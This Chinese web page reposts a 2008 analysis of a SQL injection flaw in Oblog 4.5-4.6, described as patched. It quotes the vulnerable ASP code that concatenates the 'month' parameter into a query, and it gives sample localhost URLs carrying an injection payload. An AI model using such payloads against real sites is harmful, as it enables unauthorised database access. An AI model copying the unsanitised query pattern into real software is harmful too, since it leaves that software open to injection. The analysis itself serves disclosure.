您现在的位置是:网站首页> 编程资料编程资料
Oblog最新注入漏洞分析(已修补) _漏洞分析_网络安全_
2023-05-24
293人已围观
简介 Oblog最新注入漏洞分析(已修补) _漏洞分析_网络安全_
Date:2008-5-15 Author:Yamato[BCT] Version:Oblog 4.5-4.6 sql 代码分析: 文件In/Class_UserCommand.asp : strMonth=Request("month") //第63行 strDay=Request("day") …… Case "month" //第84行 Dim LastDay G_P_FileName = G_P_FileName & "month&month=" & strMonth strDay=Left(strMonth,4) & "-" & Right(strMonth,2) & "-01" mYear=Left(strMonth,4) mMonth=Right(strMonth,2) If InStr ("01,03,05,07,08,10,12",mMonth)> 0 Then LastDay = "31"…… Else //第109行 SqlPart = " And Addtime >=’"&strMonth&"01’ AND Addtime < ’"&strMonth&LastDay&"’ " 构造合适的变量strMonth进行注射 测试方法: http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01 strDay变量从month中获得日期数据,并判断strDay是否为日期数据。所以构造的注射语句为: http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01 执行sql语句采用rst.Open strSql,Conn,1,1 不能修改记录集.
相关内容
- Discuz!!论坛wap功能模块编码的注射漏洞分析 _漏洞分析_网络安全_
- Google的博客blogspot.com窃取cookie漏洞 _漏洞分析_网络安全_
- 全面剖析DNS漏洞(图) _漏洞分析_网络安全_
- WordPress 2.6.1 SQL Column Truncation Vulnerability分析 _漏洞分析_网络安全_
- Discuz!NT 2.5最新注入漏洞测试分析(图) _漏洞分析_网络安全_
- QuickTime 0day 攻击代码发布 _漏洞分析_网络安全_
- PHPCMS2007 SP6 vote模块SQL注射漏洞的分析 _漏洞分析_网络安全_
- MS08-052 WMF漏洞分析(图) _漏洞分析_网络安全_
- Windows Vista中IE漏洞击穿系统分析 _漏洞分析_网络安全_
- Trillian XML解析器DTD文件缓冲区溢出漏洞 _漏洞分析_网络安全_
